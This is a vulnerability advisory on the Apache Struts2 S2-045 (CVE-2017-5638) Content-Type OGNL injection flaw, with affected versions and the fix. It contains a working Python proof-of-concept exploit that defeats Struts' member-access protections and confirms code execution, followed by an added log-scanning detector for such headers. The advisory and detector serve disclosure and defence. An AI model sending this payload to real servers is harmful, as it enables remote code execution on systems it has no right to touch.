[11103] 2017-03-07_Vulnerability alert: Apache Struts2 arbitrary code execution vulnerability disclosed (S2-045, CVE-2017-5638)

Document creator: s7ckTeam
Last updated: 2025-01-18
Vulnerability alert | Apache Struts2 arbitrary code execution vulnerability disclosed (S2-045, CVE-2017-5638)
FreeBuf 2017-03-07

Struts 2 RCE in the Jakarta Multipart parser, reported by Nike Zheng. Apache Struts is Apache's Java Web MVC framework.

Lab links: https://www.vulbox.com/lab · www.riskivy.com

CVE: CVE-2017-5638

Struts uses the Jakarta parser, and the vulnerability is reached through the Content-Type header. In default.properties, struts.multipart.parser can be set to jakarta, pell or cos. The jakarta parser ships with Struts 2, and jakarta is the default.

Affected versions:
Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10

Fix: if you use the Jakarta Multipart parser, upgrade to Apache Struts 2.3.32 or 2.5.10.1, or switch to a different Multipart parser implementation.

PoC:

    import sys

    import requests


    def poc(url):
        # OGNL expression sent as the Content-Type value; it writes 102*102*102*99 to the response.
        payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
        headers = {}
        headers["Content-Type"] = payload
        r = requests.get(url, headers=headers)
        # 102*102*102*99 == 105059592: the product in the body means the expression was evaluated.
        if "105059592" in r.text:
            return True
        return False


    if __name__ == '__main__':
        if len(sys.argv) == 1:
            print("python s2-045.py target")
            sys.exit()
        if poc(sys.argv[1]):
            print("vulnerable")
        else:
            print("not vulnerable")

* Apache, FreeBuf.COM
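
A defender-side check, added here as an example (not code from the original article or from the Struts project): because the PoC carries its OGNL expression in the Content-Type header, this flags header values that contain an expression opener or that fail the HTTP media-type grammar, even when they include the string multipart/form-data. The tab-separated log format, the function names and the sample lines are constructed for illustration.

```python
import re

# HTTP "token" characters; "{", "(", "@" and "=" are not among them.
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
# type "/" subtype, then optional ;name=value parameters (token or quoted string).
MEDIA_TYPE = re.compile(
    r'^%s/%s(?:\s*;\s*%s=(?:%s|"[^"\\]*"))*\s*$' % (TOKEN, TOKEN, TOKEN, TOKEN)
)
OGNL_OPENERS = ("%{", "${")  # expression delimiters evaluated by Struts/OGNL


def classify_content_type(value):
    """Return 'ognl', 'malformed' or 'ok' for one Content-Type header value."""
    if any(opener in value for opener in OGNL_OPENERS):
        return "ognl"
    if not MEDIA_TYPE.match(value):
        return "malformed"
    return "ok"


def scan(log_lines):
    """Yield (source, path, verdict) for each request whose Content-Type is not 'ok'."""
    for line in log_lines:
        source, _method, path, content_type = line.rstrip("\n").split("\t", 3)
        verdict = classify_content_type(content_type)
        if verdict != "ok":
            yield source, path, verdict


# Constructed sample log (tab-separated: source, method, path, Content-Type).
# The third value is an abbreviated, constructed stand-in for the PoC header.
SAMPLE_LOG = [
    "192.0.2.10\tPOST\t/upload.action\tmultipart/form-data; boundary=----FormBoundaryAbC123",
    "192.0.2.11\tPOST\t/login.action\tapplication/x-www-form-urlencoded",
    "198.51.100.7\tGET\t/index.action\t%{(#test='multipart/form-data')}",
    "198.51.100.8\tPOST\t/upload.action\tmultipart/form-data boundary",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A filter that only looks for the substring multipart/form-data would accept the third sample line, which is why the check validates the whole header value.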
